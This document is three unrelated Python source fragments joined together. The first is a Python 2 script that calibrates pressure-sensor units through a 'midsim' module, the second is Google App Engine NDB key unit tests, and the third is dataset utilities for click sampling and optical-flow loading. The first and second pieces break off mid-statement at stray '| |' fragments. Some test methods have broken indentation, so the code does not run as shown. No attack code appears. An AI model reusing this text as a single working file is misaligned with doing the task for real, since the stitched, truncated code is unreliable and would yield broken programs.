# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#TODO: don't be so stupid and use dictionaries instead of all these list indexes!!
import matplotlib
# matplotlib.use('Agg')
import getopt
import csv
import numpy
import sys
import time
import traceback
import midsim
import StringIO
import datetime
import pylab
from matplotlib.backends.backend_pdf import PdfPages
def usage(p):
    """Print the command-line help text to stream *p*.

    Args:
        p: output stream; when falsy (error paths pass None) falls
           back to sys.stderr.
    """
    if not p:
        p = sys.stderr
    print >> p, "Usage: " + sys.argv[0] + " [OPTION]..."
    print >> p, " -h, --help show this screen"
    print >> p, " -v, --verbose output verbose debug output"
    print >> p, " -p t,c override default pulling samples every t seconds, c many times,"
    print >> p, " default is 0,300"
    print >> p, " -r IPHOST;rp1:ra1 The port:address of the unit to use as pressure reference IPHOST; is optional"
    print >> p, " -a IPHOST;p1:a1,IPHOST;p2:a2,... The list of unit IPHOST port:adress to calibrate "
    print >> p, " IPHOST; is optional if missing assumes local mid"
    print >> p, " Examples:"
    print >> p, " -a 1:4602,3:5492,172.16.43.22:3201;1:9873"
    print >> p, " -n Bypass statistical safeguard checks, in step3"
    print >> p, " --step0 Only do step0"
    print >> p, " --step1=fileout Only do step1 put output in 'fileout'"
    print >> p, " --step2=filein,fileout Only do step2 using output from step1"
    print >> p, " --step3=filein Only do step3 using output from step2"
    print >> p, " --verify Only do verifying step"
    print >> p, ""
    print >> p, "-------------------------------------------------"
    print >> p, "By default it goes through these steps:"
    print >> p, " STEP0: Zero out calibration settings"
    print >> p, " STEP1: Gather data"
    print >> p, " STEP2: Calculate offset from data"
    print >> p, " STEP3: Program units with new calculated offsets, correctly adjusts finding current offset"
    print >> p, " VERIFY: Sample data gain verify offsets are valid, generate reports"
    print >> p, ""
def parse_unit_args(arg):
    """Parse a unit list "IPHOST;PORT:ADDRESS,..." (-a / -r argument) into
    [[hostipport_or_None, port, address], ...].

    Prints a usage hint to stderr and re-raises on malformed input.
    """
    # Split "c1,c2,..." -> each "host;port:addr" -> each "port:addr".
    pargs = [[[d for d in b.rsplit(':')] for b in c.rsplit(";")] for c in arg.split(",")]
    try:
        for i in range(len(pargs)):
            a = pargs[i]
            if len(a) > 1:
                # The host part may itself contain ':' (host:port); re-join
                # what the inner rsplit tore apart.
                a[0] = ':'.join(a[0])
            else:
                # No IPHOST given: None marks the local mid.
                a.insert(0, None)
            pargs[i] = [a[0], int(a[1][0]), int(a[1][1])]
    except:
        # Bare except is acceptable here: the error is reported and re-raised.
        print >> sys.stderr, 'ERROR: Unit argument is: IPHOST;PORT:ADDRESS or PORT:Address Examples seperated by commas'
        print >> sys.stderr, ' 172.16.43.16:5200;1:3234,172.16.43.16:5200;1:3235 \n' \
            ' or \n' \
            ' 1:3234,1:3235\n' \
            'You can mixe IPHOST with non-IPHOST.'
        raise
    return pargs
def main():
    """Parse command-line options and dispatch the calibration steps.

    Exit codes: 0 success, 1 bad getopt, 7 set-cal verify failure (via
    set_cal), 11 missing -a, 12 missing -r, 13 invalid option argument.
    """
    stats_threshold = [27, 1500, 24]  # [Error stddev, pre cal allowed error, post cal allowed error]
    config = {"verbose": False, "delay": 0, "counts": 300, "ref": [], "units": [], "stats_check": True, "step0": False,
              "step1": [None, None], "step2": [None, None], "step3": [None, None], "verify": False,
              "stats_threshold": stats_threshold}
    try:
        opts, args = getopt.getopt(sys.argv[1:], "hvp:r:a:n",
                                   ["help", "verbose", "step0", "step1=", "step2=", "step3=", "verify"])
    except getopt.GetoptError, err:
        print str(err)
        usage(None)
        sys.exit(1)
    try:
        for o, a in opts:
            # print o, a
            if o in ("-h", "--help"):
                usage(sys.stdout)
                sys.exit(0)
            elif o in ("-v", "--verbose"):
                config["verbose"] = True
            elif o in ("-p",):
                # -p t,c : sample every t seconds, c many times.
                a = [int(a) for a in a.split(",")]
                config["delay"] = a[0]
                config["counts"] = a[1]
            elif o in ("-r",):
                config["ref"] = parse_unit_args(a)[0]
            elif o in ("-a",):
                config["units"] = parse_unit_args(a)
            elif o in ("-n",):
                config["stats_check"] = False
            elif o in ("--step0",):
                config["step0"] = True
            elif o in ("--step1",):
                config["step1"][1] = a
            elif o in ("--step2",):
                config["step2"] = a.split(",")
                config["step2"][0] = parse_step2in(config["step2"][0])
            elif o in ("--step3",):
                config["step3"] = a.split(",")
                config["step3"][0] = parse_step3in(config["step3"][0])
            elif o in ("--verify",):
                config["verify"] = True
    except SystemExit as e:
        # Let explicit sys.exit() calls (e.g. from --help) pass through.
        sys.exit(e)
    except:
        print >> sys.stderr, 'ERROR: Invalid option argument.'
        print >> sys.stderr, traceback.format_exc()
        print >> sys.stderr
        usage(None)
        sys.exit(13)
    if len(config["units"]) == 0:
        print >> sys.stderr, "ERROR: No units provided with -a"
        usage(None)
        sys.exit(11)
    if len(config["ref"]) != 3:
        print >> sys.stderr, "ERROR: Missing reference information -r"
        usage(None)
        sys.exit(12)
    # Lets start
    # Run only the single requested step, or the full pipeline by default.
    if config["verify"]:
        step4(config)
    elif config["step3"][0]:
        step3(config)
    elif config["step2"][0]:
        step2(config)
    elif config["step1"][1]:
        step1(config)
    elif config["step0"]:
        step0(config)
    else:
        step0(config)
        step1(config)
        step2(config)
        step3(config)
        step4(config)
    sys.exit(0)
def set_cal(hostipport, port, address, value):
    """Program one unit's pressure calibration offset via midsim and verify
    the read-back equals *value*; exits with code 7 on mismatch.

    Args:
        hostipport: "host:port" of the remote mid, or None for local.
        port: bus port number.
        address: unit address.
        value: calibration offset to program.
    """
    outstream = StringIO.StringIO()
    remote = ""
    if hostipport:
        remote = "-r "+hostipport
    args = (
        "%s %s -f csv -p %d -a %d -t %s --set-cal=%d" % ("midsim.py", remote, port, address, "pressurewide", value)
    ).split()
    midsim.midsim(args, outstream)
    mout = outstream.getvalue()
    outstream.close()
    # midsim prints CSV "address,value"; field 1 is the read-back value.
    v = int(mout.rstrip().split(",")[1])
    if v != value:
        print >> sys.stderr, "ERROR: Unit calibration was not set correctly: sp = %d != pv = %d" % (value, v)
        sys.exit(7)
def step0(config):
    """STEP0: clear (zero out) the calibration offset on every unit."""
    print "Zeroing out calibration settings..."
    for unit in config["units"]:
        # unit is [hostipport_or_None, port, address].
        hostipport = unit[0]
        port = unit[1]
        address = unit[2]
        set_cal(hostipport, port, address, 0)
def step1_diffport(config):
    """Collect raw pressure samples for every unit, each unit reading
    bracketed by two reference reads.

    Returns rows [hostipport, port, address, ref_value, unit_value, ref_value].
    """
    # [[Port, Unit_ADDRESS, REF_VALUE, UNIT_VALUE, REF_VALUE], ...]
    alldata = []
    for i in xrange(config["counts"]):
        sys.stdout.write("Sample %d/%d \r" % (i + 1, config["counts"]))
        sys.stdout.flush()
        for unit in config["units"]:
            # Get Reference value
            data = []
            data.extend([unit[0], unit[1], unit[2]])
            if unit[0] is config["ref"][0] and unit[1] == config["ref"][1]:
                # Unit shares the reference's host/port: read ref, unit, ref
                # with a single three-address midsim call.
                outstream = StringIO.StringIO()
                remote = ""
                if unit[0]:
                    remote = "-r "+unit[0]
                midsim.midsim(["midsim.py"] + ("%s -f csv -p %d -a %d,%d,%d -t %s" % (
                    remote, config["ref"][1], config["ref"][2], unit[2], config["ref"][2], "pressurewide")).split(),
                    outstream)
                mout = outstream.getvalue()
                outstream.close()
                data.extend([int(c) for c in mout.rstrip().split(",")[1:]])
                alldata.append(data)
            else:
                # Different host/port: three separate reads (ref, unit, ref).
                outstream = StringIO.StringIO()
                remote = ""
                if config["ref"][0]:
                    remote = "-r "+config["ref"][0]
                midsim.midsim(("%s %s -f csv -p %d -a %d -t %s" % (
                    "midsim.py", remote, config["ref"][1], config["ref"][2], "pressurewide")).split(), outstream)
                mout = outstream.getvalue()
                outstream.close()
                data.append(int(mout.rstrip().split(",")[1]))
                # Get other unit values
                outstream = StringIO.StringIO()
                remote = ""
                if unit[0]:
                    remote = "-r "+unit[0]
                args = "%s %s -f csv -p %d -a %d -t %s" % ("midsim.py", remote, unit[1], unit[2], "pressurewide")
                args = args.split()
                midsim.midsim(args, outstream)
                mout = outstream.getvalue()
                outstream.close()
                data.append(int(mout.rstrip().split(",")[1]))
                # Get Reference value
                outstream = StringIO.StringIO()
                remote = ""
                if config["ref"][0]:
                    remote = "-r "+config["ref"][0]
                args = "%s %s -f csv -p %d -a %d -t %s" % (
                    "midsim.py", remote, config["ref"][1], config["ref"][2], "pressurewide")
                args = args.split()
                midsim.midsim(args, outstream)
                mout = outstream.getvalue()
                outstream.close()
                data.append(int(mout.rstrip().split(",")[1]))
                alldata.append(data)
        time.sleep(config["delay"])
    print
    return alldata
def step1(config):
    """STEP1: gather samples; write them to the --step1 output file (then
    exit) or stash them in config["step2"][0] for the next step."""
    # Gather Data
    print "Gathering Samples..."
    # Determine whether every unit (and the reference) shares one host/port.
    sameports = True
    port = config["units"][0][1]
    for unit in config["units"]:
        if unit[0] is not config["units"][0][0] or unit[1] != port:
            sameports = False
            break
    if sameports and (config["ref"][0] is not config["units"][0][0] or config["ref"][1] != port):
        sameports = False
    # [[Port, Unit_ADDRESS, REF_VALUE, UNIT_VALUE, REF_VALUE], ...]
    if sameports:
        # XXX: Make a super fast sampler
        alldata = step1_diffport(config)
    else:
        alldata = step1_diffport(config)
    if config["step1"][1] is not None:
        with open(config["step1"][1], 'wb') as f:
            for row in alldata:
                f.write("%s,%d,%d,%d,%d,%d\n" % (row[0], row[1], row[2], row[3], row[4], row[5]))
        sys.exit(0)
    else:
        config["step2"][0] = alldata
def parse_step2in(filename):
    """Read a step1 output CSV back into sample rows.

    The literal string 'None' in the host column (written for local,
    host-less units) is converted back to the None object.
    """
    with open(filename, 'rb') as f:
        sr = csv.reader(f, delimiter=',', quotechar='"')
        alldata = []
        for row in sr:
            d = [row[0], int(row[1]), int(row[2]), int(row[3]), int(row[4]), int(row[5])]
            if d[0] == 'None':
                d[0] = None
            alldata.append(d)
    return alldata
def step2(config):
    """STEP2: group samples per unit, average the bracketing reference
    reads, and compute error statistics plus a suggested offset; write
    them to the --step2 output file (then exit) or stash in config."""
    print "Calculating States..."
    # sort step2 in data
    # [[port, address, [[r1, v1, r2], ...]]]
    sorted_data = []
    for row in config["step2"][0]:
        found = False
        for srow in sorted_data:
            if srow[0] is row[0] and srow[1] == row[1] and srow[2] == row[2]:
                srow[3].append([row[3], row[4], row[5]])
                found = True
                break
        if not found:
            sorted_data.append([row[0], row[1], row[2], [[row[3], row[4], row[5]]]])
    # Calculate Offsets
    # [ [port, address, mean_error, stddev_error, minerror, maxerror, suggested_offset] ]
    calculations = []
    for row in sorted_data:
        zdata = zip(*row[3])
        # The reference was read before and after each unit read; average the two.
        r = (numpy.array(zdata[0]) + numpy.array(zdata[2])) / 2.0
        me = r - numpy.array(zdata[1])
        mean_error = numpy.mean(me)
        stddev_error = numpy.std(me)
        minerror = numpy.min(me)
        maxerror = numpy.max(me)
        suggested_offset = round(mean_error)
        calculations.append([row[0], row[1], row[2], mean_error, stddev_error, minerror, maxerror, suggested_offset])
    if config["step2"][1] is not None:
        with open(config["step2"][1], 'wb') as f:
            for row in calculations:
                f.write("%s,%d,%d,%f,%f,%f,%f,%d\n" % (row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7]))
        sys.exit(0)
    else:
        config["step3"][0] = calculations
def | |
<gh_stars>10-100
#!/usr/bin/env python
#
# Copyright 2007 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Tests for key.py."""
import base64
import collections
import datetime
import os
import pickle
import sortedcontainers
from google.appengine.ext.ndb import key
from google.appengine.ext.ndb import model
from google.appengine.ext.ndb import tasklets
from google.appengine.ext.ndb import test_utils
import six
from six.moves import range
from six.moves import zip
from google.appengine.api import datastore_errors
from google.appengine.api import datastore_types
from google.appengine.datastore import entity_bytes_pb2 as entity_pb2
from absl.testing import absltest as unittest
class KeyTests(test_utils.NDBTest):
the_module = key
def testShort(self):
    """Positional (kind, id) constructor arguments round-trip through flat()."""
    for flat_spec in (('Kind', None), ('Kind', 1), ('Parent', 42, 'Kind', 1)):
        self.assertEqual(key.Key(*flat_spec).flat(), flat_spec)
def testFlat(self):
    """A key built via flat= exposes pairs(), flat(), and kind() consistently."""
    flat = ('Kind', 1)
    k = key.Key(flat=flat)
    self.assertEqual(k.pairs(), (('Kind', 1),))
    self.assertEqual(k.flat(), flat)
    self.assertEqual(k.kind(), 'Kind')
def testFlatLong(self):
    """flat= with two (kind, id) pairs; kind() reports the last kind."""
    flat = ('Kind', 1, 'Subkind', 'foobar')
    k = key.Key(flat=flat)
    self.assertEqual(k.pairs(), (('Kind', 1), ('Subkind', 'foobar')))
    self.assertEqual(k.flat(), flat)
    self.assertEqual(k.kind(), 'Subkind')
def testSerialized(self):
    """Round-trip a two-level key through its serialized, urlsafe, and
    protobuf Reference representations."""
    flat = ['Kind', 1, 'Subkind', 'foobar']
    # Build the expected protobuf Reference by hand: int id for the first
    # path element, string name for the second.
    r = entity_pb2.Reference()
    r.app = 'ndb-test-app-id'
    e = r.path.element.add()
    e.type = flat[0]
    e.id = flat[1]
    e = r.path.element.add()
    e.type = flat[2]
    e.name = flat[3]
    serialized = r.SerializeToString()
    ref_bytes = six.ensure_binary(r.SerializeToString())
    # The urlsafe form is URL-safe base64 with the '=' padding stripped.
    urlsafe = base64.urlsafe_b64encode(ref_bytes).rstrip(b'=')
    # A key constructed from each representation must expose all of them.
    k = key.Key(flat=flat)
    self.assertEqual(k.serialized(), serialized)
    self.assertEqual(k.urlsafe(), urlsafe)
    self.assertEqual(k.reference(), r)
    k = key.Key(urlsafe=urlsafe)
    self.assertEqual(k.serialized(), serialized)
    self.assertEqual(k.urlsafe(), urlsafe)
    self.assertEqual(k.reference(), r)
    k = key.Key(serialized=serialized)
    self.assertEqual(k.serialized(), serialized)
    self.assertEqual(k.urlsafe(), urlsafe)
    self.assertEqual(k.reference(), r)
    k = key.Key(reference=r)
    # The key must copy the Reference, not alias the caller's object.
    self.assertIsNot(k.reference(), r)
    self.assertEqual(k.serialized(), serialized)
    self.assertEqual(k.urlsafe(), urlsafe)
    self.assertEqual(k.reference(), r)
    k = key.Key(reference=r, app=r.app, namespace='')
    self.assertIsNot(k.reference(), r)
    self.assertEqual(k.serialized(), serialized)
    self.assertEqual(k.urlsafe(), urlsafe)
    self.assertEqual(k.reference(), r)
    k1 = key.Key('A', 1)
    # Known-good urlsafe encoding for app 'ndb-test-app-id'.
    self.assertEqual(k1.urlsafe(), b'ag9uZGItdGVzdC1hcHAtaWRyBwsSAUEYAQw')
    k2 = key.Key(urlsafe=k1.urlsafe())
    self.assertEqual(k1, k2)
  def testId(self):
    """id() returns the leaf pair's string or integer id (None if incomplete)."""
    k1 = key.Key('Kind', 'foo', app='app1', namespace='ns1')
    self.assertEqual(k1.id(), 'foo')
    k2 = key.Key('Subkind', 42, parent=k1)
    self.assertEqual(k2.id(), 42)
    k3 = key.Key('Subkind', 'bar', parent=k2)
    self.assertEqual(k3.id(), 'bar')
    # An incomplete key (no id assigned yet) reports None.
    k4 = key.Key('Subkind', None, parent=k3)
    self.assertEqual(k4.id(), None)
  def testIdentity(self):
    """kind() and id() echo the constructor arguments (as subTests)."""
    test_kind, test_id = 'test-kind', 'test-id'
    k = key.Key(test_kind, test_id)
    with self.subTest(name='Kind'):
      self.assertEqual(k.kind(), test_kind)
    with self.subTest(name='ID'):
      self.assertEqual(k.id(), test_id)
  def testStringId(self):
    """string_id() is the leaf id for string ids, None for int or unset ids."""
    k1 = key.Key('Kind', 'foo', app='app1', namespace='ns1')
    self.assertEqual(k1.string_id(), 'foo')
    k2 = key.Key('Subkind', 'bar', parent=k1)
    self.assertEqual(k2.string_id(), 'bar')
    k3 = key.Key('Subkind', 42, parent=k2)
    self.assertEqual(k3.string_id(), None)
    k4 = key.Key('Subkind', None, parent=k3)
    self.assertEqual(k4.string_id(), None)
  def testIntegerId(self):
    """integer_id() is the leaf id for int ids, None for string or unset ids."""
    k1 = key.Key('Kind', 42, app='app1', namespace='ns1')
    self.assertEqual(k1.integer_id(), 42)
    k2 = key.Key('Subkind', 43, parent=k1)
    self.assertEqual(k2.integer_id(), 43)
    k3 = key.Key('Subkind', 'foobar', parent=k2)
    self.assertEqual(k3.integer_id(), None)
    k4 = key.Key('Subkind', None, parent=k3)
    self.assertEqual(k4.integer_id(), None)
  def testParent(self):
    """parent() is None for root keys; child keys extend the parent's path."""
    p = key.Key('Kind', 1, app='app1', namespace='ns1')
    self.assertEqual(p.parent(), None)
    k = key.Key('Subkind', 'foobar', parent=p)
    self.assertEqual(k.flat(), ('Kind', 1, 'Subkind', 'foobar'))
    self.assertEqual(k.parent(), p)
    # Explicitly repeating the parent's app/namespace must be accepted.
    k = key.Key(
        'Subkind', 'foobar', parent=p, app=p.app(), namespace=p.namespace())
    self.assertEqual(k.flat(), ('Kind', 1, 'Subkind', 'foobar'))
    self.assertEqual(k.parent(), p)
  def testRoot(self):
    """root() walks to the topmost ancestor (itself for a root key)."""
    p = key.Key('Kind', 1, app='app1', namespace='ns1')
    self.assertEqual(p.root(), p)
    k = key.Key('Subkind', 'foobar', parent=p)
    self.assertEqual(k.flat(), ('Kind', 1, 'Subkind', 'foobar'))
    self.assertEqual(k.root(), p)
    # Two levels down the root is still the original top-level key.
    k2 = key.Key(
        'Subsubkind', 42, parent=k, app=p.app(), namespace=p.namespace())
    self.assertEqual(k2.flat(),
                     ('Kind', 1, 'Subkind', 'foobar', 'Subsubkind', 42))
    self.assertEqual(k2.root(), p)
  def testRepr_Inferior(self):
    """repr() of a multi-level key lists the full path; str() matches repr()."""
    k = key.Key('Kind', 1, 'Subkind', 'foobar')
    self.assertEqual(repr(k), "Key('Kind', 1, 'Subkind', 'foobar')")
    self.assertEqual(repr(k), str(k))
  def testRepr_Toplevel(self):
    """repr() of a single-pair key."""
    k = key.Key('Kind', 1)
    self.assertEqual(repr(k), "Key('Kind', 1)")
  def testRepr_Incomplete(self):
    """repr() shows None for an incomplete (unset) id."""
    k = key.Key('Kind', None)
    self.assertEqual(repr(k), "Key('Kind', None)")
  def testRepr_UnicodeKind(self):
    """Unicode kinds repr as UTF-8 escapes on PY2, as text on PY3."""
    k = key.Key(u'\u1234', 1)
    if six.PY2:
      self.assertEqual(repr(k), "Key('\\xe1\\x88\\xb4', 1)")
    else:
      self.assertEqual(repr(k), u"Key('\u1234', 1)")
  def testRepr_UnicodeId(self):
    """Unicode string ids repr as UTF-8 escapes on PY2, as text on PY3."""
    k = key.Key('Kind', u'\u1234')
    if six.PY2:
      self.assertEqual(repr(k), "Key('Kind', '\\xe1\\x88\\xb4')")
    else:
      self.assertEqual(repr(k), u"Key('Kind', '\u1234')")
  def testRepr_App(self):
    """A non-default app id appears in the repr."""
    k = key.Key('Kind', 1, app='foo')
    self.assertEqual(repr(k), "Key('Kind', 1, app='foo')")
  def testRepr_Namespace(self):
    """A non-default namespace appears in the repr."""
    k = key.Key('Kind', 1, namespace='foo')
    self.assertEqual(repr(k), "Key('Kind', 1, namespace='foo')")
  def testUnicode(self):
    """Unicode kinds/ids survive construction, encoding and reference round-trips."""
    flat_input = (u'Kind\u1234', 1, 'Subkind', u'foobar\u4321')
    # six.ensure_str yields UTF-8 bytes on PY2 and native str on PY3; the key
    # is expected to normalise its path components to that form.
    flat = (six.ensure_str(flat_input[0]), flat_input[1], flat_input[2],
            six.ensure_str(flat_input[3]))
    pairs = tuple((flat[i], flat[i + 1]) for i in range(0, len(flat), 2))
    k = key.Key(flat=flat_input)
    self.assertEqual(k.pairs(), pairs)
    self.assertEqual(k.flat(), flat)
    r = k.reference()
    serialized = k.serialized()
    urlsafe = k.urlsafe()
    # Construction must also accept the decoded (text) forms of the encodings.
    key.Key(urlsafe=urlsafe.decode('utf8'))
    key.Key(serialized=serialized.decode('utf8'))
    key.Key(reference=r)
    # A hand-built Reference with a unicode type and name round-trips too.
    r = entity_pb2.Reference()
    r.app = 'ndb-test-app-id'
    e = r.path.element.add()
    e.type = flat[0]
    e.name = flat[3]
    k = key.Key(reference=r)
    self.assertEqual(k.reference(), r)
  def testHash(self):
    """A key hashes like the tuple of its (kind, id) pairs."""
    flat = ['Kind', 1, 'Subkind', 'foobar']
    pairs = [(flat[i], flat[i + 1]) for i in range(0, len(flat), 2)]
    k = key.Key(flat=flat)
    self.assertEqual(hash(k), hash(tuple(pairs)))
  def testOrdering(self):
    """Keys order by app, then namespace, then path; all comparisons are total."""
    a = key.Key(app='app2', namespace='ns2', flat=('kind1', 1))
    b = key.Key(app='app2', namespace='ns1', flat=('kind1', 1))
    c = key.Key(app='app1', namespace='ns1', flat=('kind1', 1))
    d = key.Key(app='app1', namespace='ns1', flat=('kind1', 2))
    e = key.Key(app='app1', namespace='ns1', flat=('kind1', 'e'))
    f = key.Key(app='app1', namespace='ns1', flat=('kind1', 'f'))
    g = key.Key(app='app1', namespace='ns1', flat=('kind2', 'f', 'x', 1))
    h = key.Key(app='app1', namespace='ns1', flat=('kind2', 'f', 'x', 2))
    # Note int ids sort before string ids within the same kind.
    expected = [c, d, e, f, g, h, b, a]
    actual = sorted([a, b, c, d, e, f, g, h])
    self.assertEqual(actual, expected)
    # Exhaustively check every rich comparison against the sorted positions.
    for i in range(len(actual)):
      for j in range(len(actual)):
        self.assertEqual(actual[i] < actual[j], i < j)
        self.assertEqual(actual[i] <= actual[j], i <= j)
        self.assertEqual(actual[i] > actual[j], i > j)
        self.assertEqual(actual[i] >= actual[j], i >= j)
        self.assertEqual(actual[i] == actual[j], i == j)
        self.assertEqual(actual[i] != actual[j], i != j)
  def testUniqueIncomplete(self):
    """0, '' and None all denote an incomplete leaf id and compare equal."""
    p0 = None
    p1 = key.Key('bar', 1)
    # Check both with and without a parent key.
    for p in p0, p1:
      a = key.Key('foo', 0, parent=p)
      b = key.Key('foo', '', parent=p)
      c = key.Key('foo', None, parent=p)
      self.assertEqual(a, b)
      self.assertEqual(b, c)
      self.assertEqual(c, a)
      for x in a, b, c:
        # All accessor forms agree that the id is unset.
        self.assertEqual(x.id(), None)
        self.assertEqual(x.string_id(), None)
        self.assertEqual(x.integer_id(), None)
        self.assertEqual(x.pairs()[-1], ('foo', None))
        self.assertEqual(x.flat()[-1], None)
        self.assertEqual(x.urlsafe(), c.urlsafe())
  def testIncomplete(self):
    """Only the LAST pair may be incomplete; non-scalar ids are rejected."""
    key.Key(flat=['Kind', None])
    # An unset id in a non-leaf position is invalid.
    self.assertRaises(
        datastore_errors.BadArgumentError,
        key.Key,
        flat=['Kind', None, 'Subkind', 1])
    self.assertRaises(TypeError, key.Key, flat=['Kind', ()])
  def testKindFromModel(self):
    """A Model class may be used in place of a kind string; _get_kind() is honored."""
    class M(model.Model):
      pass
    class N(model.Model):
      @classmethod
      def _get_kind(cls):
        return 'NN'
    k = key.Key(M, 1)
    self.assertEqual(k, key.Key('M', 1))
    # Model classes may appear at any position in the path.
    k = key.Key('X', 1, N, 2, 'Y', 3)
    self.assertEqual(k, key.Key('X', 1, 'NN', 2, 'Y', 3))
  def testKindFromBadValue(self):
    """A non-string, non-Model kind is rejected."""
    self.assertRaises(Exception, key.Key, 42, 42)
  def testDeleteHooksCalled(self):
    """_pre/_post_delete_hook fire once per key for delete_async and delete_multi_async."""
    test = self
    self.pre_counter = 0
    self.post_counter = 0
    class HatStand(model.Model):
      @classmethod
      def _pre_delete_hook(cls, key):
        test.pre_counter += 1
        # Only verify the key on the first (single-delete) call; the
        # multi-delete below fires before self.key is updated per key.
        if test.pre_counter == 1:
          self.assertEqual(self.key, key)
      @classmethod
      def _post_delete_hook(cls, key, future):
        test.post_counter += 1
        self.assertEqual(self.key, key)
        # delete() yields None once the RPC completes.
        self.assertIs(future.get_result(), None)
    furniture = HatStand()
    key = furniture.put()
    self.key = key
    self.assertEqual(self.pre_counter, 0, 'Pre delete hook called early')
    future = key.delete_async()
    self.assertEqual(self.pre_counter, 1, 'Pre delete hook not called')
    self.assertEqual(self.post_counter, 0, 'Post delete hook called early')
    future.get_result()
    self.assertEqual(self.post_counter, 1, 'Post delete hook not called')
    # Repeat with ten entities through delete_multi_async: pre-hooks fire at
    # call time, post-hooks only as each future is resolved.
    new_furniture = [HatStand() for _ in range(10)]
    keys = [furniture.put() for furniture in new_furniture]
    multi_future = model.delete_multi_async(keys)
    self.assertEqual(self.pre_counter, 11,
                     'Pre delete hooks not called on delete_multi')
    self.assertEqual(self.post_counter, 1,
                     'Post delete hooks called early on delete_multi')
    for fut, key in zip(multi_future, keys):
      self.key = key
      fut.get_result()
    self.assertEqual(self.post_counter, 11,
                     'Post delete hooks not called on delete_multi')
  def testNoDefaultDeleteCallback(self):
    """A model with no delete hooks must not queue a no-op callback on the future."""
    ctx = tasklets.get_context()
    # Disable caching so the delete really issues an RPC.
    ctx.set_cache_policy(False)
    class EmptyModel(model.Model):
      pass
    entity = EmptyModel()
    entity.put()
    fut = entity.key.delete_async()
    self.assertFalse(fut._immediate_callbacks,
                     'Delete hook queued default no-op.')
  def testGetHooksCalled(self):
    """_pre/_post_get_hook fire once per key for get_async and get_multi_async."""
    test = self
    self.pre_counter = 0
    self.post_counter = 0
    class HatStand(model.Model):
      @classmethod
      def _pre_get_hook(cls, key):
        test.pre_counter += 1
        # Only verify the key on the first (single-get) call; the multi-get
        # below fires before self.key is updated per key.
        if test.pre_counter == 1:
          self.assertEqual(key, self.key)
      @classmethod
      def _post_get_hook(cls, key, future):
        test.post_counter += 1
        self.assertEqual(key, self.key)
        # get() resolves to the stored entity.
        self.assertEqual(future.get_result(), self.entity)
    furniture = HatStand()
    self.entity = furniture
    key = furniture.put()
    self.key = key
    self.assertEqual(self.pre_counter, 0, 'Pre get hook called early')
    future = key.get_async()
    self.assertEqual(self.pre_counter, 1, 'Pre get hook not called')
    self.assertEqual(self.post_counter, 0, 'Post get hook called early')
    future.get_result()
    self.assertEqual(self.post_counter, 1, 'Post get hook not called')
    # Repeat with ten entities through get_multi_async: pre-hooks fire at call
    # time, post-hooks only as each future is resolved.
    new_furniture = [HatStand() for _ in range(10)]
    keys = [furniture.put() for furniture in new_furniture]
    multi_future = model.get_multi_async(keys)
    self.assertEqual(self.pre_counter, 11,
                     'Pre get hooks not called on get_multi')
    self.assertEqual(self.post_counter, 1,
                     'Post get hooks called early on get_multi')
    for fut, key, entity in zip(multi_future, keys, new_furniture):
      self.key = key
      self.entity = entity
      fut.get_result()
    self.assertEqual(self.post_counter, 11,
                     'Post get hooks not called on get_multi')
def testMonkeyPatchHooks(self):
hook_attr_names = ('_pre_get_hook', '_post_get_hook', '_pre_delete_hook',
'_post_delete_hook')
original_hooks = {}
for name in hook_attr_names:
original_hooks[name] = getattr(model.Model, name)
self.pre_get_flag = False
self.post_get_flag = False
self.pre_delete_flag = False
self.post_delete_flag = False
class HatStand(model.Model):
@classmethod
def _pre_get_hook(cls, unused_key):
self.pre_get_flag = True
@classmethod
def _post_get_hook(cls, unused_key, unused_future):
self.post_get_flag = True
@classmethod
def _pre_delete_hook(cls, unused_key):
self.pre_delete_flag = True
@classmethod
def _post_delete_hook(cls, unused_key, unused_future):
self.post_delete_flag = True
for name in hook_attr_names:
hook = getattr(HatStand, name)
setattr(model.Model, name, hook)
try:
| |
import itertools as it
import os
import random
from scipy.ndimage import distance_transform_edt
import cv2
import numpy as np
from skimage import color, morphology
from datasets.Util.flo_Reader import read_flo_file
from datasets.Util.python_pfm import readPFM
# Minimum spacing / maximum distance (in pixels) used when sampling clicks:
# clicks are kept roughly D/2 apart, and negative background clicks are
# restricted to at most D pixels from the object.
D = 40
# Margin (pixels) eroded/dilated around the object boundary before sampling.
D_MARGIN = 5
# Number of positive clicks to sample
Npos = 5
# Number of negative clicks to sample using strategy 1, 2 and 3 respectively of https://arxiv.org/abs/1603.04042
Nneg1 = 10
Nneg2 = 5
Nneg3 = 10
def unique_list(l):
  """Return a new list with the elements of *l* in first-seen order, duplicates dropped.

  Uses a linear membership scan (not a set) so unhashable elements are supported.
  """
  deduped = []
  for item in l:
    if item in deduped:
      continue
    deduped.append(item)
  return deduped
def create_index_image(height, width):
  """Return a (height, width, 2) integer tensor whose [y, x] entry is (y, x)."""
  import tensorflow as tf
  y = tf.range(height)
  x = tf.range(width)
  # tf.meshgrid(x, y) returns (X, Y); stacking (grid[1], grid[0]) puts the
  # row coordinate first so the channel order is (row, col).
  grid = tf.meshgrid(x, y)
  index_img = tf.stack((grid[1], grid[0]), axis=2)
  return index_img
def smart_shape(x):
  """Return the shape of tensor *x* as a list, mixing static and dynamic dims.

  Statically-known dimensions are plain ints; dimensions that are None in the
  static shape are replaced with the corresponding tf.shape() scalar tensor.
  """
  import tensorflow as tf
  shape = x.get_shape().as_list()
  tf_shape = tf.shape(x)
  for i, s in enumerate(shape):
    if s is None:
      shape[i] = tf_shape[i]
  return shape
def read_pfm(fn):
  """Read a PFM file and return only the image data (drops readPFM's scale)."""
  return readPFM(fn)[0]
def username():
  """Return the current login name from the USER env var (raises KeyError if unset)."""
  return os.environ["USER"]
def _postprocess_flow(x, flow_as_angle):
if flow_as_angle:
assert False, "not implemented yet"
else:
# divide by 20 to get to a more useful range
x /= 20.0
return x
def load_flow_from_pfm(fn, flow_as_angle=False):
  """Load a 2-channel optical-flow field from a PFM file and rescale it."""
  # 3rd channel is all zeros
  flow = read_pfm(fn)[:, :, :2]
  flow = _postprocess_flow(flow, flow_as_angle)
  return flow
